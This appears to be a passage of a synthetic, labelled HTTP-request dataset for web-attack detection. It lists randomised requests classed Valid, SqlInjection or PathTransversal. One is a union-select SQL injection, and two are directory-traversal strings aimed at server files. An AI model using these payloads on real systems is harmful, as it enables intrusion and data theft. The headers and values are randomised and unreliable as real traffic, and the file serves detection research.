UA-Disp: 5226,2357,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1080x271
Via: 4.9 www.qpiawasO.htm:4644, 0.8 245.53.218.221
Transfer-Encoding: gzip
Upgrade: gefl/7.1, lhm/3.4, crto/0.1, lwu/3.1
Warning: 803 211.131.116.100 "tisise5eslK" "Tue, 29 Dec 09 16:59:21 UTC"
X-Forwarded-For: 38.148.116.46
X-Serial-Number: 44759103360851284549
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26135
Start - Id: 3548
class: Valid
GET /.OI/rvJ9kQ4LPM6_/teitegaFie/ec/dmhpfLFEQmbXVZ7gJ/lsyadminZEgU7H946linkI.js? HTTP/1.0
Host: 33.179.247.82
Connection: oove5r
Accept: */*;q=0.9
Accept-Charset: iso-8859-6, x-mac-arabic, iso-2022-kr;q=0.4, iso-10646-ucs-2, isiri-3342;q=0.4
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: no-transform
Client-ip: 101.224.207.92
Cookie: Giu=x;e3s3=o2A4lsodlf7m;nirbRjnf7sab=p%;sBsreidkrDegr=96
Cookie2: $Version="4"
Date: Sun, 19 Nov 06 10:18:07 UTC
ETag: "SB9beLAXh_TSR9h5-qU"
Expect: 100-continue
From: en6o@GjeessSofa.org
If-Modified-Since: Fri, 17 Jul 09 10:53:22 CET
If-Unmodified-Since: Thu, 25 Nov 04 09:05:26 GMT
If-Match: "susZ2zhROpLUXoA@yWrA"
If-None-Match: *
If-Range: "YwNw2UgGP2343tHTJ6A"
Max-Forwards: 328
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: gu9n tahhnbsr=mhYueol
Authorization: Basic b1R1SWh4OmVhaW9jbGEx
Range: -5
Referer: /ireasiah/yethLl/Ovblr/wotDe.png
TE: gzip,gzip;q=0.4,trailers
Trailer: Date
User-Agent: ceEsaac/6.9
UA-CPU: MIPS
UA-Disp: 0012,4574,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 105x3816
Via: 0.8 www.jilm.jpg, 3.8 255.150.248.146:682, Tnege/0.2 19.99.92.189:60
Transfer-Encoding: compress
Upgrade: ayed/3.7
Warning: 342 233.167.105.67 "eneoshetbsundot" 
X-Forwarded-For: 63.217.151.16
X-Serial-Number: 1354631787
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3548
Start - Id: 4783
class: Valid
PUT /hhqY.0X-MjPDjBp/oKKlzHhJgNkAHsPXemc/llmsnsfaeyotf/qscript.ZbAoptAZyrer6..html? HTTP/1.1
Content-Length: 62
Content-Language: mao,benyest,ce0om
Content-Encoding: deflate
Content-Location: /heniaOs/Ep4reodt.msf
Content-MD5: aGl5bm1UUzZiYW5lZXJzcQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 17 Aug 06 05:16:50 CET
Last-Modified: Mon, 10 Jan 05 01:18:23 UTC
Host: www.ttqnmq.it:80
Connection: ceo9a7a
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 187.93.237.97
Cookie: srEtnpaLD29c=rs;Orhiaq=7t.IYAQ3AEd;cea4=trcAMtjE;i66ia=h-jVUhRKG8;s35esubneht=63
Cookie2: $Version="9"
Date: Tue, 05 Sep 06 05:37:07 GMT
ETag: "xAn8A7w_qwd-Ao4RS@tB"
Expect: 100-continue
From: 9mwiN@6woe1E.net
If-Modified-Since: Thu, 11 Mar 04 12:02:19 UTC
If-Unmodified-Since: Sun, 02 Apr 06 09:50:30 CET
If-Match: *
If-None-Match: "XjejdQqNjI9Ai3m"
If-Range: Fri, 18 Nov 05 22:12:03 CET
Max-Forwards: 2526
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.efttzis.be/nlrez/ltpeh/rkieoIj.gif
Authorization: vwe1d r2enpe=ept8tsN
Range: 1757-72,-28304,0-
Referer: /eemthiMw.php3
TE: gzip;q=0.6,chunked;q=0.4
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.8 (compatible; hblehthw; Win98; peSoe; mMmtotdn; dtkshz)
UA-CPU: x86
UA-Disp: 109,747,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 425x376
Via: 6.6 34.22.86.232, 3.9 202.60.23.57:03, HTTP/3.1 140.132.151.24
Transfer-Encoding: identity
Upgrade: zedlh/8.1, naR/6.0, eeufs/3.6, reei/8.9, fshaut/4.2
Warning: 865 www.coRthr.shtml "oCpstedTscbho" "Thu, 07 Dec 06 06:32:02 GMT"
X-Forwarded-For: 247.63.27.49
X-Serial-Number: 095672914255730
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

zSn7_PZ0=jHXPw&oskTonaeiedi4=Asasktrlate ed&frhscmytlopl=redho

End - Id: 4783
Start - Id: 41962
class: SqlInjection
GET /kjh_husECiL0/gd97NhJxNGa0/rioG5LXJELe/erjNec/51lQ@cG/.st/tkHL9/ceEtgorf6hecrxmqdh.swf?esh3B=e&xharTwp6=4559679&yoatemie0=201&srenePrknmh=8324135&GofCkcWBZEjf=%27+union++++select++++%40%40version%2C1%2C1%2C1--&htiol=reoj&ve3inea2nieRifx=456667&te7zhoao8eeclo=y2tbetween&oin4=e30aRb&oiiog8=3076708308&octop2=8251363&pi6iDAraeuodto8=tfbs HTTP/1.1
Host: www.tofodgtth.it
Connection: close
Accept: */*
Accept-Charset: iso-2022-jp, x-mac-korean, iso-8859-3, isiri-3342;q=0.6, hz-gb-2312;q=0.2
Accept-Encoding: compress, gzip;q=0.1, deflate;q=0.3, deflate
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 241.210.73.73
Cookie: 9XcBVs@=ebisbaof;7i5ti=scriptarthd
Cookie2: $Version="14"
Date: Sun, 01 Apr 07 18:56:34 CET
ETag: W/"L5smUaADBs4uUok.30rh"
Expect: 2eweYa=sefI;hdtn
From: lbrsawDh@elfoa4b.fr
If-Modified-Since: Wed, 29 Oct 08 10:17:08 UTC
If-Unmodified-Since: Fri, 23 Jan 04 22:59:35 GMT
If-Match: *
If-None-Match: "lzrt-akqZh-eIEpQvG6U"
If-Range: "xIb31vCFE_JVQ9n"
Max-Forwards: 182
MIME-Version: 0.8
Pragma: siottdgm='b8'
Proxy-Authorization: Digest nonce
Authorization: Digest nonce
Range: 170-12,11579-8643,1-
Referer: /hedat/ioee.mpg
TE: deflate,gzip;q=0.9,trailers
Trailer: Proxy-Authorization
User-Agent: nettdsahA/6.1
UA-CPU: MIPS
UA-Disp: 4298,556,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1383x317
Via: 0.7 181.119.192.241, HTTP/5.9 www.ssal.jpeg, FTP/0.9 53.112.180.184
Transfer-Encoding: identity
Upgrade: osgosN/1.6, nzpps/5.5, rhoft/4.2, feo/7.7, htler/3.3
Warning: 494 42.216.10.168:95428 "esi7pe3nyrrtei" "Wed, 28 Apr 10 16:07:09 UTC"
X-Forwarded-For: 88.3.128.18
X-Serial-Number: 41242078999326437
----: ------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 41962
Start - Id: 28574
class: Valid
GET /%uhtacces0aWe-/r-Hfqt49E/0FPfcXwY6I1/r-sIIHw8lPFyPYe/dUDcj8SPqEtA3Ek/cF1iTamZxx/e@r6uy0m/aIRf/x2LGYd5S/jvls@/mwtzphsgwgrdv6iXe/lasaorvtiTn.tiff? HTTP/1.0
Host: www.trooae.gov
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: iso-8859-15;q=0.5
Accept-Encoding: gzip;q=0.2, deflate;q=0.8
Accept-Language: *
Cache-Control: max-stale
Client-ip: 32.126.230.226
Cookie: dexfi8b3=mailwns5 da;orhNgshp=ncneaf3'y0w;zoX=e-oid;tl=s/0laenph-?allecg;tB=iIEosr
Cookie2: $Version="5"
Date: Sun, 12 Mar 06 16:44:44 CET
ETag: W/"IlSB0SVupMAYKnpEoST"
Expect: s1yno7eS=hb0h
From: toIs6eah@Rhqboi.biz
If-Modified-Since: Fri, 22 May 09 11:34:49 CET
If-Unmodified-Since: Wed, 15 Apr 09 14:41:03 UTC
If-Match: "p0vikljvZB8SIGDHJy"
If-None-Match: "txFbicv4IM0Z1B19ce"
If-Range: Tue, 18 Oct 05 08:27:46 UTC
Max-Forwards: 3
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: dothii rw4uoS=mtsNtaid
Authorization: Digest nonce
Range: 8-800450
Referer: /neefi.asp
TE: chunked;q=0.6,gzip;q=0.2,gzip
Trailer: If-Modified-Since
User-Agent: Mozilla/1.4 (Windows; U; WinNT 0.1; lf-re; rv:2.8.0) Gecko/52259055
UA-CPU: StrongARM
UA-Disp: 3600,6698,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 5673x9154
Via: HTTP/6.2 www.1tOrds.css, HTTP/4.9 235.35.134.65, 4.5 www.sosagdu.jpeg:2
Transfer-Encoding: deflate
Upgrade: R1cdel/0.2
Warning: 425 202.135.1.163 "oeae" "Wed, 30 May 07 10:46:17 UTC"
X-Forwarded-For: 247.244.131.237
X-Serial-Number: 37650652134780806
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 28574
Start - Id: 45918
class: PathTransversal
GET /tet5tDchhux6v/rwu/rlAV/d5U_O/nTeeenh/e9ictdO7dsete/Ayaarote6nietyanb/ae/mt09maaSddpey7rs/iWkBtpaCy/qxP-y8S0P3nnV6KJvNu.gif?eVog8r=%29ie1e&9loosv=qdce4wh++%5DcRtnI5if%3Bs&yHeoMEhjthplla=08&Tgc=rvon8yOfLp9&rstceDdaoanv=m91fmFKjq&Ckmteb=roIHkqHBuTfY&oiiiod4eEp=mD%2Bel-e&Gddh=lnddsth&6o3en=7&cTG.=57694989&jnFupdate9g2=annOAehli&r1diefFraeabv=%2FaetyVebb&Lm4aMe4ga=qssleaoauxe%2Fctcopy&tbQrdephxEieaes=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fneserera%2Fdema%2Flestde%2Fvene.nsf HTTP/1.1
Host: 216.0.84.167
Connection: close
Accept: image/*;q=0.4, application/*;q=0.9, text/*;q=0.8
Accept-Charset: utf-7, koi8-r
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-age=7743
Client-ip: 90.133.156.2
Cookie: HEiso=gkj3;j5PY9x1IC=en=>
Cookie2: $Version="3"
Date: Mon, 14 May 07 18:13:10 GMT
ETag: W/"mLsp4l@CbIwwgt7c-"
Expect: 100-continue
From: leat@aeegln9ow.cz
If-Modified-Since: Fri, 10 Aug 07 04:27:24 UTC
If-Unmodified-Since: Sat, 08 Oct 05 07:28:07 UTC
If-Match: "uNs44YLwif8QZFBm"
If-None-Match: "7eDkmWR0e_oJS55"
If-Range: Tue, 22 Dec 09 02:50:22 GMT
Max-Forwards: 584
MIME-Version: 1.5
Pragma: ya=aua
Proxy-Authorization: omjasV v1Eoao=notim
Authorization: soov2n irliL=osbe7e8i
Range: -106180,0973-,3598-
Referer: /Lme5qat/ureeu.css
TE: deflate
Trailer: TE
User-Agent: Mozilla/8.4 (X11; U; Open BSD i386 9.2; ob-je; rv:3.2.5) Gecko/70367071
UA-CPU: 68000
UA-Disp: 1794,840,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4595x1071
Via: 8.1 57.233.59.130, FTP/0.7 www.k4ule.htm:93, 0.6 37.12.244.229
Transfer-Encoding: gzip
Upgrade: dhvol/0.8, Pde/4.9
Warning: 095 56.21.175.106:259 "l0gwyrihdtorxlLesCEm" "Thu, 01 Mar 07 09:16:13 CET"
X-Forwarded-For: 210.181.84.191
X-Serial-Number: 715330032292
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45918
Start - Id: 27896
class: Valid
GET /set86aeOogeoAeatb/rcbFbviod/nqhxb@c/g_CINmXTwmmK/i.gTTLnuDOgOjK/l2uJwaZEveCc2DhzI.shtml?seqhaOumcmtle8=1&exectmpyeJwhere=v76GOw_&link0a_42bl0aLdr=28&m6dpsi4SMnSrod=ylmedi&h3Rd=295151869&tBamoo3e8ecy=0dkana+1rhinn&i6ylm2Tren=sd%5Dtor&O6OShZgroup bywZu=724900 HTTP/1.1
Host: www.he7n.be
Connection: keep-alive
Accept: image/*;q=0.2
Accept-Charset: x-mac-arabic
Accept-Encoding: 
Accept-Language: v-nEaGsw;q=0.4, Enrruw-oNBZa
Cache-Control: no-transform
Client-ip: 55.159.118.14
Cookie: ahesgT1di1ny=89782154;ky4J8SCobjectincludee4=198997;s2kUtEariTn=xp_c systemshutdown;z1roleeesCor=7f84QQ;avNX=14
Cookie2: $Version="414"
Date: Sat, 03 May 08 06:42:46 GMT
ETag: W/"3hswNqFh5hwEH4G_3v_"
Expect: adoNaao
From: ksaefm@Ittg.fr
If-Modified-Since: Sat, 27 Feb 10 15:47:33 GMT
If-Unmodified-Since: Sat, 06 Oct 07 13:12:51 GMT
If-Match: "Gh6XlrsZVjyay7AG2j5m"
If-None-Match: "x2V5X11rCsYQZ-ATg"
If-Range: "RxbxlRowHr-hj4wKsSUB"
Max-Forwards: 6964
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: aettn eirbLbai=7jxtaai
Authorization: isawd radt=iahu
Range: 6-04307,08-
Referer: /rHoxni/iitlt9i/DepU/ute9qlo/ggreaWip.bin
TE: chunked;q=0.1,gzip;q=0.0
Trailer: Accept-Encoding
User-Agent: wPOkyhkUGv http://www.deige.fr
UA-CPU: x86
UA-Disp: 3738,726,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 869x220
Via: HTTP/6.5 www.onOwDds0.html
Transfer-Encoding: identity
Upgrade: set0s1/4.2, y0tTe/1.1, kaxgt/4.9, 7lzo/0.2
Warning: 729 145.90.231.141 "3eaErmadimLiprnrhIe" "Tue, 13 Dec 05 17:49:23 GMT"
X-Forwarded-For: 141.34.54.32
X-Serial-Number: 79183560393
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 27896
Start - Id: 9273
class: Valid
GET /s98am4thiensbetr6er/4PsapO/g.Wp3DY/iRg.jsp?ea9Rr=85516868&et=9265&ouQS0AnT3J=25&tEznutbi=692&ir=29&Oeeswefs=4390641&ih=vjs9b HTTP/1.0
Host: 218.169.30.119
Connection: close
Accept: video/quicktime;q=0.3, text/html;q=0.4
Accept-Charset: windows-1251, x-mac-arabic, x-mac-arabic
Accept-Encoding: *
Accept-Language: sIe9a-cdRfo, Ltea-fsd, wee-nxdsoiIT;q=0.8
Cache-Control: no-cache
Client-ip: 126.233.178.83
Cookie: enSgs=RuosiiframehbnFn)a0d: rps;r6c1=9301640;eytops2rtro=nc0eadmindisn9f;dses=sEenHtfpRhfhtkafbo;7H8PT=reiI)tehH%e
Cookie2: $Version="84"
Date: Fri, 19 Oct 07 21:37:24 GMT
ETag: "w.Mt6Okd.XPkWt4Oq"
Expect: vt4hih9=nniom4e
From: vsdit@a9hosdr9ad.fr
If-Modified-Since: Fri, 01 Apr 05 14:29:12 CET
If-Unmodified-Since: Sun, 11 Nov 07 02:02:38 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 31 Mar 07 06:14:07 CET
Max-Forwards: 0704
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic c2FvdDp0bU55bGt0
Authorization: Basic cWdhaUhGb2U6OGhldGw2c2Q=
Range: 39-95,-16552
Referer: /ehn0/Xceahpe/Ciede/nocp/OoiliT.asmx
TE: trailers,gzip
Trailer: Expect
User-Agent: Mozilla/8.3 (Windows; U; Windows NT 2.6; bg-al; rv:8.8.0) Gecko/14005721
UA-CPU: 68000
UA-Disp: 2674,9502,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0125x395
Via: 1.5 186.189.40.228
Transfer-Encoding: aT5sTp
Upgrade: vgj/0.2, w8yeWH/7.5
Warning: 290 110.110.36.21 "oon7Ni" 
X-Forwarded-For: 215.205.82.248
X-Serial-Number: 378312956268
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 9273
Start - Id: 28797
class: Valid
GET /iieqEnjcpSshelbti/oiG2mt3/sjQjv59MCM/rr2bwM@u/W71lm0rsahtSja.nsf? HTTP/1.0
Host: www.sieoDi.com
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.0, deflate;q=0.9
Accept-Language: *
Cache-Control: eemadhe4=tlnn
Client-ip: 103.43.26.246
Cookie: otreNwrgr=39669;yediemidsS=18;hker=?scnhih;afhayleysptOeE=rd<N;dvm3fkhYlc=ncsinr;ae=Ideot6rshex4gewo5
Cookie2: $Version="013"
Date: Mon, 07 Apr 08 01:29:58 UTC
ETag: "POAG9b7VXcpL9LDyOu"
Expect: 100-continue
From: ii5owga@lSueai.biz
If-Modified-Since: Tue, 22 Sep 09 10:23:35 GMT
If-Unmodified-Since: Sun, 05 Mar 06 17:34:00 CET
If-Match: *
If-None-Match: "45egbpSijUvPIbD0K"
If-Range: *
Max-Forwards: 421
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: NTLM bjNvbWV1cmFyY3hmaGVtbUtubG5yM2VjZWVzTGNtcGd0bGRvOWdtOGNubHhvYUU=
Authorization: NTLM dENzaThvc1NFdHNlbzRhb2VvYW9paW40cmdxaW9hYWNlbWxocg==
Range: -928062,21307-
Referer: http://www.1Ftowhrh.uk/woeaddae.jsp
TE: gzip,trailers,trailers
Trailer: Via
User-Agent: Mozilla/9.6 (Windows; U; Windows NT 1.9; Si-tt; rv:2.8.7) Gecko/29670564
UA-CPU: MIPS
UA-Disp: 982,8595,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 804x445
Via: encqio/4.0 www.mrmeoajp.tiff:47, FTP/4.0 www.haye9Ed.shtml
Transfer-Encoding: identity
Upgrade: dma/7.4, st8cs/3.2, ehL/8.4, tDaep/0.4
Warning: 024 www.ocgrr.jpeg "t8oEi6aqlerym" 
X-Forwarded-For: 1.11.0.97
X-Serial-Number: 39502
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 28797
Start - Id: 20543
class: Valid
GET /cqdHCs/l8AZpFRduvH/rSxQnMgqBSLidy73w8At/Vv8vbscriptKal/ntoiordcfbnhF6A.shtml?s9=s HTTP/1.0
Host: www.iu5a.gov:20693
Connection: ioqs
Accept: image/*;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: B-j;q=0.2, 9cwrh-eyo;q=0.9, aretwrhl-stt;q=0.6, s-rH2teb, hrocxm-ytEneih
Cache-Control: max-age=57377
Client-ip: 69.8.127.35
Cookie: XTcXWW1yHi=e1rrez;Gao7he=aDTTDf7_;uuoetnhtn=oq1tnsHsmtnfo;3HI2pwexecrbbgsoundHk=ea  ecetl6o iSdlm
Cookie2: $Version="98"
Date: Fri, 29 Jan 10 07:26:47 CET
ETag: "A8KyYtMgg7z.ePImxV1"
Expect: 100-continue
From: rtixlirr@ceAoas.biz
If-Modified-Since: Thu, 06 Sep 07 05:19:51 GMT
If-Unmodified-Since: Fri, 04 Dec 09 08:29:10 CET
If-Match: *
If-None-Match: "SCzzi0jhYVrThPd6"
If-Range: Sat, 27 Jan 07 02:08:01 CET
Max-Forwards: 368
MIME-Version: 6.3
Pragma: nhi=Wt70sv
Proxy-Authorization: NTLM b2VidHBvYXRlaHlodDB3OHJzcjNwb250d0VjaGFSR3hudGdlaGllck9vbjlhdw==
Authorization: Digest algorithm=MD5-sess
Range: 877-
Referer: /wredUh/ui0gnc/ilahoa2s/e8adnas.tiff
TE: chunked;q=0.2,gzip;q=0.1,chunked
Trailer: If-None-Match
User-Agent: d0LxUDVkK http://www.yrdr.com
UA-CPU: x86
UA-Disp: 9823,4223,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 2533x094
Via: oeaeeA/5.1 139.83.37.201, 8.0 15.111.233.203, 1.7 www.7itsn.jpeg:0
Transfer-Encoding: identity
Upgrade: aOnbin/5.3, cUojlc/5.1
Warning: 151 146.124.39.49:89 "lAPnn" "Sat, 02 Jul 05 07:47:23 GMT"
X-Forwarded-For: 206.2.157.2
X-Serial-Number: 07667933891936164
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20543
Start - Id: 29912
class: Valid
GET /Vt/hHLAK_zJ.html?hoeelnnmht=ale&lNH8SbWAXM=1214&VuTJp-JUNz=9360200088&x2iigtxad4qi=76466077&eeteoerem=r4up3xt&sosnsdss9q=4044&-3jZJHzSTTYvar=oh5avar%27oupdate%5B2&gERveeto7td4f=7FisetsAdarihc&2o7hdsctn=2628&a0=%7Ehooc8ue&gioMro6tH=dyHqH_ HTTP/1.1
Host: www.Mhtfenm.uk
Connection: hvyi25e
Accept: */*
Accept-Charset: x-mac-greek;q=0.7, macintosh;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 62.30.118.125
Cookie: agezdoexx9=ip;owcuvoong=eo1so;tseotysno=95
Cookie2: $Version="15"
Date: Fri, 22 Aug 08 01:16:26 UTC
ETag: W/"7MRCAMCo4sZHzVITp"
Expect: 100-continue
From: uudtsny@Iiar7.st
If-Modified-Since: Thu, 14 Sep 06 15:19:06 UTC
If-Unmodified-Since: Sun, 23 Jan 05 24:48:57 CET
If-Match: "Ot8WDR3KHAJx7hT3d"
If-None-Match: "h.JJJCSfv@_xQ8vk6"
If-Range: *
Max-Forwards: 1
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: meaud m7h0u=nztdpF
Authorization: giiOst melen=sou1ni
Range: 73-062771
Referer: http://eaefe.com/aelydm/sihe8.js
TE: chunked;q=0.7
Trailer: If-Match
User-Agent: iwhOireund/4.9.5
UA-CPU: 68000
UA-Disp: 5197,782,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 3101x221
Via: 4.7 5.239.91.78, 1.4 www.onbMfq.htm, FTP/5.0 15.46.138.36
Transfer-Encoding: gzip
Upgrade: spt/3.7, rs8xQ/8.1, ovEla/6.7, hsp/5.3, ecaol/5.8
Warning: 601 103.90.185.56:00009 "bInvy9od2reoewohbO" "Thu, 26 Mar 09 12:32:40 UTC"
X-Forwarded-For: 221.63.83.226
X-Serial-Number: 89410
----: ------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 29912
Start - Id: 23990
class: Valid
GET /otZqwd_gn.sh?loiiDrioevhRyw=hhlrieri1o3adie&nsltnte1euijE=1n5wecmkn7hvda&LAKIuCorAwG=iuemde4nne%24e&npjhiodedwlnhe=591876&F_CQUHV0p5L3=%2Fln&wtelnetc6ARMb.-location=ukttelnet2O HTTP/1.0
Host: www.srtEl3xp.it
Connection: close
Accept: application/rtf;q=0.4, image/*, audio/*
Accept-Charset: iso-8859-15;q=0.3, iso-8859-9, isiri-3342
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: no-transform
Client-ip: 98.45.103.252
Cookie: YRJBmetanQa=i co;F4n=e2K1le0;PhomeErmGwN=crogessrao
Cookie2: $Version="6"
Date: Mon, 24 Jan 05 13:07:49 GMT
ETag: "3SedFYmE7BvFCyEuj4u"
Expect: xe67=iiao
From: rESt9@oraehs.ch
If-Modified-Since: Sun, 30 Nov 08 17:38:32 CET
If-Unmodified-Since: Sun, 21 Oct 07 14:20:44 CET
If-Match: "f.a6-tRzjWyK05p4BL"
If-None-Match: *
If-Range: Wed, 17 Sep 08 07:50:43 CET
Max-Forwards: 33
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: NTLM a2dDM2Fvcmllc3Rlc25hdG1tbG1hY3cyYXF5NXQ5ZTJ0Y28wb3RF
Authorization: Basic ZXR3ZGlmOkxuc3Nl
Range: 57-083666,74376-4577,088-
Referer: /hfrh/bhol.bin
TE: trailers
Trailer: Cache-Control
User-Agent: cwAennlcoL/2.6.3.1
UA-CPU: StrongARM
UA-Disp: 5815,0896,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 087x1525
Via: 0.5 221.184.78.19, tRce2/1.8 184.237.245.33, HTTP/3.7 1.16.153.134:49
Transfer-Encoding: gzip
Upgrade: miguh/0.4
Warning: 097 www.wrfc.jpeg "otniol0w" 
X-Forwarded-For: 53.58.146.5
X-Serial-Number: 336999
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 23990
Start - Id: 11632
class: Valid
GET /5pd9uetg0pyAl.asp?execqosN=phsi&dhthd2Dcde=603162&eOpvppssxz6wprn=heouan&0eo=p6hn%25i&bONnsdt=SformeipfjSt%2Basalndp+&hvhtabana=35501&otori3yO=8mochasR&rd2eal=0&ttsta=Cno1i+insrlchomemc&aboxsddlsr=Pfdf7s4%3E&R-xf=nnqsewindow.open&es=havingve%25%29Rl&4seraho=Cotgs HTTP/1.1
Host: www.Rvg3rrcn.cz
Connection: keep-alive
Accept: application/postscript, audio/basic;q=0.0
Accept-Charset: cp-950;q=0.7, utf-7, iso-8859-1;q=0.3, windows-874, iso-2022-jp;q=0.1
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 130.128.37.7
Cookie: pedp2odmhljs=tihRt5elhoehjiZk;DK8Y=bodyngt+ysedea;YWFM=@Z$https(;rto=025911
Cookie2: $Version="9"
Date: Sat, 07 May 05 10:53:16 GMT
ETag: W/"YGUUzT50f6838RbTMEhm"
Expect: 100-continue
From: llde@xop7tnntt.de
If-Modified-Since: Thu, 23 Oct 08 13:27:32 UTC
If-Unmodified-Since: Fri, 06 Feb 04 07:58:44 GMT
If-Match: "UC3IFTWehKj46QJ"
If-None-Match: *
If-Range: Sat, 24 Mar 07 10:51:50 UTC
Max-Forwards: 47
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: 9ei7eS ES58he4=8t2ih3od
Authorization: Digest realm
Range: 265882-,79-,501141-
Referer: /onosew.swf
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: zehd (cU8Nx4)
UA-CPU: MIPS
UA-Disp: 3478,401,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 3585x2586
Via: FTP/9.7 www.cfb6tapb.png, FTP/8.5 www.s2sax.htm, hipela/4.9 38.180.161.185
Transfer-Encoding: compress
Upgrade: Hsoeo/0.1, t4K/8.3, iwhfu/8.2
Warning: 857 www.weac.gif "Cdlyhd" 
X-Forwarded-For: 1.197.88.127
X-Serial-Number: 046539438868930
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11632
Start - Id: 36087
class: PathTransversal
GET /0rmZ2jopenCUDRTVWWX/vw/sgJz6A/bauyj0oibsi/hV56/lULKVTjhAXeMwxE@/iAhheHtoagnymsarset/CntXt/bf@/nU1r/n.ROl-Kb@qM.png?izibeeat=..........................WINNTsystem.ini&ialoem=97967691&oiiol=4&sso7A4gzhowptpo=048226&dUnrNnrWtoia=12961&r3hmkhrrm5a=rndkuneaknsivj&A0ah48b=7696605714&oztdRysrncapt=a3z.jXxAKQ&kAxb=wqtflinmweu8qcti&epreehr=312399&xp_K0d_5fhtaccesS=lntoi&w9sitcrceh=cmdqty&rsnmceIEi9eaa=eleqlo HTTP/1.1
Host: www.csettS1edl.be
Connection: s8d6Na
Accept: */*;q=0.1
Accept-Charset: windows-1254;q=0.2, cp-936, euc-cn, x-mac-japanese;q=0.7, windows-1255;q=0.8
Accept-Encoding: deflate;q=0.6
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 50.135.3.140
Cookie: deosoelId=in;laulwoerlseht=2142942;dcelt=2383;ewleAsn9Nls=9008;fckeoh=56250;sst6r=ohin%ryq<
Cookie2: $Version="1"
Date: Sun, 09 Nov 08 12:56:39 GMT
ETag: W/"vj6-gIvwcOr79OE6"
Expect: 100-continue
From: 2srfon@a2wsst04Ft.cz
If-Modified-Since: Mon, 24 Mar 08 01:19:56 GMT
If-Unmodified-Since: Mon, 26 Mar 07 01:15:47 GMT
If-Match: "pJAnMs@qp5xjKKVe"
If-None-Match: *
If-Range: *
Max-Forwards: 804
MIME-Version: 8.7
Pragma: m='plP90'
Proxy-Authorization: Digest username="ftps"
Authorization: NTLM dFNsaGdwcnNzbUVlcnR5ZWVpbGFtbzdyZXRpZW96bHBub2l6c25n
Range: 580617-399630,-49399
Referer: http://www.l4eni.biz/rL8din/wMee/si7n/mk3oire.php
TE: trailers,deflate;q=0.7,trailers
Trailer: Host
User-Agent: efadU (bruRS.JO; n4hBXnbt; ihWt.Hr; e5_YR1cpP0)
UA-CPU: Sparc
UA-Disp: 6269,3972,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 039x0543
Via: 2.7 101.14.29.209:9
Transfer-Encoding: gzip
Upgrade: Fd1sk/0.3
Warning: 647 231.206.148.64:01 "5tdtn" 
X-Forwarded-For: 67.242.104.199
X-Serial-Number: 0275337100162
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36087
Start - Id: 22605
class: Valid
